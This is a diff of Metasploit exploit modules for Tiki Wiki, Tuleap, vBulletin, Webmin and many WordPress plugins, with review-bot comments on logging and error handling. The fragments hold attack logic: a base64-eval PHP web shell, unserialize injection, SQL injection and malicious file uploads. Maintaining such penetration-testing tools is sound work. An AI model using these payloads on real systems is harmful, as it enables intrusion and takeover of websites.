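Review bot: The new line `print_status("Login successful with #{username}:#{password}")` in the hunk at line 107 still writes the account password in clear text to the console, and from there into any spooled or shared session log. Log the account name only, `print_status("Login successful as #{username}")`; the `fail_with` context line just above it carries the same interpolation. The same applies to the matching line in tuleap_unserialize_exec.rb (hunk at line 74) and to `Authenticating with WordPress using #{username}:#{password}...` in wp_admin_shell_upload.rb (hunk at line 68).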
@@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' @upload_php = rand_text_alpha(rand(4) + 4) + ".php" - print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem") + print_status("Disclosing the path of the Tiki Wiki on the filesystem") res = send_request_cgi( 'uri' => normalize_uri(base, "tiki-rss_error.php") @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote return else tiki_path = $1 - print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}" + print_good "Tiki Wiki path disclosure: #{tiki_path}" end php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>" @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}" printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { @@ -117,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") + print_error("Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_cgi( { 
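Review bot: The rescue branch in the hunk at line 66 interpolates `f`, which is not assigned anywhere in the visible part of the method; the file being removed is `@upload_php`. If `f` is indeed undefined, a failed `rm` raises NameError from inside the rescue instead of printing the error. Use `print_error("Unable to remove #{@upload_php}")`. The method starts above the hunk, so check that no `f` is defined there.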
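Review bot: In the hunk at line 117 the guard is `if not res or res.code != 200`, so the new `print_error("Exploit failed: #{res.code}. ...")` is also reached when `res` is nil and then raises NoMethodError instead of reporting the failure. Cover the no-response case before building the message, for example `code = res ? res.code : 'no response'`, and interpolate `code`. The surrounding method begins and ends outside the hunk.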
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index 037463b905..ac13d101db 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def do_login() - print_status("#{peer} - Logging in...") + print_status("Logging in...") username = datastore['USERNAME'] password = datastore['PASSWORD'] @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") res.get_cookies end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the PHP object injection...") + print_status("Exploiting the PHP object injection...") exec_php(payload.encoded) end end diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index da87cb4613..373ad569cc 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end 
@@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -356,18 +356,18 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(session) - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end 
@@ -425,22 +425,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.empty? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i users = [] - print_good("#{peer} - #{count_users} users found") + print_good("#{count_users} users found") for i in 0..count_users - 1 user = get_user_data(node_id, i) @@ -466,10 +466,10 @@ class Metasploit3 < Msf::Exploit::Remote @session = nil users.each do |user| - print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...") + print_status("Trying to log into vBulletin admin control panel as #{user[0]}...") @session = do_login(user[0], user[1]) unless @session.blank? - print_good("#{peer} - Logged in successfully as #{user[0]}") + print_good("Logged in successfully as #{user[0]}") break end end @@ -478,7 +478,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel") end - print_status("#{peer} - Getting the install product security token...") + print_status("Getting the install product security token...") install_token = get_install_token if install_token.nil? fail_with(Failure::Unknown, "#{peer} - Failed to get the install token") 
@@ -486,9 +486,9 @@ class Metasploit3 < Msf::Exploit::Remote @session_hash = install_token[:session_hash] @product_id = rand_text_alpha_lower(5 + rand(8)) - print_status("#{peer} - Installing the malicious product #{@product_id}...") + print_status("Installing the malicious product #{@product_id}...") if install_product(install_token) - print_good("#{peer} - Product successfully installed... payload should be executed...") + print_good("Product successfully installed... payload should be executed...") else # Two situations trigger this path: # 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often. @@ -497,18 +497,18 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index 652d68b0fe..45c8bbe1cf 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb 
@@ -154,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /Invalid Username\/Password/ - vprint_error("#{peer} - Invalid Username or Password.") + vprint_error("Invalid Username or Password.") return Exploit::CheckCode::Detected elsif res.body =~ /Invalid session_name/ - vprint_error("#{peer} - Web client session not found") + vprint_error("Web client session not found") return Exploit::CheckCode::Detected elsif res.body =~ /\.\n\.\.\n/m return Exploit::CheckCode::Vulnerable @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking if injection is possible...") + print_status("Checking if injection is possible...") res = request('ls -a .') unless res and res.code == 200 @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /Invalid session_name/ fail_with(Failure::NoAccess, "#{peer} - Valid web client session not found, provide astGUI or wait until someone logins") unless astguiclient_creds? - print_error("#{peer} - Valid web client session not found, trying to create one...") + print_error("Valid web client session not found, trying to create one...") res = login unless res and res.code == 200 and res.body =~ /you are logged/ fail_with(Failure::NoAccess, "#{peer} - Invalid astGUIcient credentials, check astGUI credentials or wait until someone login.") @@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Injection hasn't been possible") end - print_good("#{peer} - Exploitation looks feasible, proceeding... ") + print_good("Exploitation looks feasible, proceeding... ") request("#{payload.encoded}", 1) end diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 29c80dd4bf..1579b33cc9 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb 
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Attempting to login...") + vprint_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if res and res.code == 302 and res.get_cookies =~ /sid/ - vprint_good "#{peer} - Authentication successful" + vprint_good "Authentication successful" session = res.get_cookies.split("sid=")[1].split(";")[0] else - vprint_error "#{peer} - Service found, but authentication failed" + vprint_error "Service found, but authentication failed" return Exploit::CheckCode::Detected end - vprint_status("#{peer} - Attempting to execute...") + vprint_status("Attempting to execute...") command = "echo #{rand_text_alphanumeric(rand(5) + 5)}" @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -121,18 +121,18 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to execute the payload...") + print_status("Attempting to execute the payload...") command = payload.encoded 
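Review bot: In the hunk at line 121, `print_good "Authentication successfully"` is emitted twice on the success path, once inside `if session and not session.empty?` and again right after that inner `if` closes. Remove the second call. While touching the string, `print_good "Authentication successful"` would match the wording already used in `check`. The `exploit` method continues outside the hunk.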
@@ -144,9 +144,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.message =~ /Document follows/ - print_good "#{peer} - Payload executed successfully" + print_good "Payload executed successfully" else - print_error "#{peer} - Error executing the payload" + print_error "Error executing the payload" return end diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 7d6f169d17..5817ebf9d4 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -59,16 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /Eppler Software/ if res.body =~ / - v5\.1\.20101016/ - vprint_status("#{peer} - Found version: 5.1.20101016") + vprint_status("Found version: 5.1.20101016") return Exploit::CheckCode::Appears elsif res.body =~ / - v(5\.[\d\.]+)/ - vprint_status("#{peer} - Found version: #{$1}") + vprint_status("Found version: #{$1}") return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cppassword', 'cpdomain' ] - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...") + print_status("Sending payload (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install2.php'), @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 and res.body =~ /Failed to connect to database server/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::Unknown, "#{peer} - Something went wrong") end 
diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index 7c9f49e32a..1ab30f176f 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -68,22 +68,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") plugin_name = Rex::Text.rand_text_alpha(10) payload_name = "#{Rex::Text.rand_text_alpha(10)}" payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded - print_status("#{peer} - Executing the payload at #{payload_uri}...") + print_status("Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php") register_files_for_cleanup("#{plugin_name}.php") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5) diff --git a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb index 9f07c15816..06b6f4b909 100644 --- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb 
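Review bot: The status line in the `exploit` hunk of wp_admin_shell_upload.rb still interpolates the cleartext password, `print_status("Authenticating with WordPress using #{username}:#{password}...")`, so the credential ends up in console scrollback and in any spooled or shared log. Log the account name only, e.g. `print_status("Authenticating with WordPress as #{username}...")`. The same pattern remains in the `exploit` hunks of wp_easycart_unrestricted_file_upload.rb and wp_photo_gallery_unrestricted_file_upload.rb. The method body may continue past the end of this hunk.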
+++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb @@ -76,20 +76,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Trying to login as #{username}") + vprint_status("Trying to login as #{username}") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil? - vprint_status("#{peer} - Trying to get nonce") + vprint_status("Trying to get nonce") nonce = get_nonce(cookie) fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil? - vprint_status("#{peer} - Trying to upload payload") + vprint_status("Trying to upload payload") # This must be default.php filename = 'default.php' - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file") + print_status("Calling uploaded file") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index 9d0cbd7ce6..dc6b8ca785 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb 
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'asset-manager', 'upload.php'), @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'assets', 'temp', payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb index f09d836152..f86704f106 100644 --- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /files|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename) ) 
diff --git a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb index 3504f81df9..ced2ed7f8c 100644 --- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb +++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"") - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'post.php'), @@ -61,14 +61,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/ uploaded_filename = res.body register_files_for_cleanup(uploaded_filename) - print_status("#{peer} - File #{uploaded_filename} successfully uploaded") + print_status("File #{uploaded_filename} successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - Error on uploading file") end file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename) - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( { 'uri' => file_path, diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 9d554ee3e2..39b948f6d9 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb 
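Review bot: In the `@@ -61,14` hunk of wp_downloadmanager_upload.rb the whole response body becomes `uploaded_filename`, and the only check on it is `res.body =~ /#{Regexp.escape(filename)}$/`, where `$` matches at the end of any line rather than the end of the string. A multi-line or path-bearing body from the remote server would therefore pass and be handed unchanged to `register_files_for_cleanup` and `normalize_uri`. Anchor the match with `\z` (or `\Z` if a trailing newline is expected) and reject a body that contains a path separator before using it as a file name. The enclosing method starts and ends outside the hunk.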
@@ -111,29 +111,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication - vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication + vprint_status("WordPress authentication attack is enabled") if use_wordpress_authentication + vprint_status("EC authentication attack is enabled") if use_ec_authentication if use_wordpress_authentication && use_ec_authentication - print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") + print_status("Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") end if use_wordpress_authentication - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) if !cookie if use_ec_authentication - print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") + print_warning("Failed to authenticate with WordPress, attempting upload with EC password next...") else fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') end else - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") end end - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) date_hash = Rex::Text.md5(Time.now.to_s) uploaded_filename = "#{payload_name}_#{date_hash}.php" 
@@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename) data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication) - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => uploader_url, @@ -152,9 +152,9 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? - vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_error("Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") register_files_for_cleanup(uploaded_filename) res = send_request_cgi( { @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if !res.nil? && res.code == 404 - print_error("#{peer} - Failed to upload the payload") + print_error("Failed to upload the payload") else - print_good("#{peer} - Executed payload") + print_good("Executed payload") end end end diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index 1fefb811ca..10b9d39bbd 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = Rex::MIME::Message.new post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") - print_status("#{peer} - Sending PHP payload") + print_status("Sending PHP payload") res = send_request_cgi( 'method' => 'POST', 
@@ -67,19 +67,19 @@ class Metasploit3 < Msf::Exploit::Remote ) if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end filename = "#{Regexp.last_match[1]}.php" - print_good("#{peer} - Our payload is at: #{filename}. Calling payload...") + print_good("Our payload is at: #{filename}. Calling payload...") register_files_for_cleanup(filename) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename) ) - print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200 + print_error("Server returned #{res.code}") if res && res.code != 200 end end diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb index 1fb64e7e7c..525d1dfce9 100644 --- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb @@ -46,10 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(5)}.php" - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'), 
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") }, 5 diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 50f0daf8e2..4ae974b7a5 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -64,11 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => holding_pattern_uploader_url, @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end diff --git a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb index f06a853ea6..cacccd0f7d 100644 --- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb 
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body.include?(php_page_name) - print_good("#{peer} - Our payload is at: #{php_page_name}.") + print_good("Our payload is at: #{php_page_name}.") register_files_for_cleanup(php_page_name) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not answer') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb index 6338d3ed78..99deba5747 100644 --- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb +++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb @@ -66,13 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end - print_status("#{peer} - Calling payload ...") + print_status("Calling payload ...") send_request_cgi({ 'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb index 806e529145..485c58a950 100644 --- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb 
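Review bot: The `else` branch in the wp_infusionsoft_upload.rb hunk reads `res.code`, but the condition `res && res.code == 200 && ...` also fails when `res` is nil, so a request that gets no response raises NoMethodError instead of a clean failure. Add a guard before the check, e.g. `fail_with(Failure::Unreachable, "#{peer} - No response from the target") if res.nil?`. The method body starts and ends outside the hunk.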
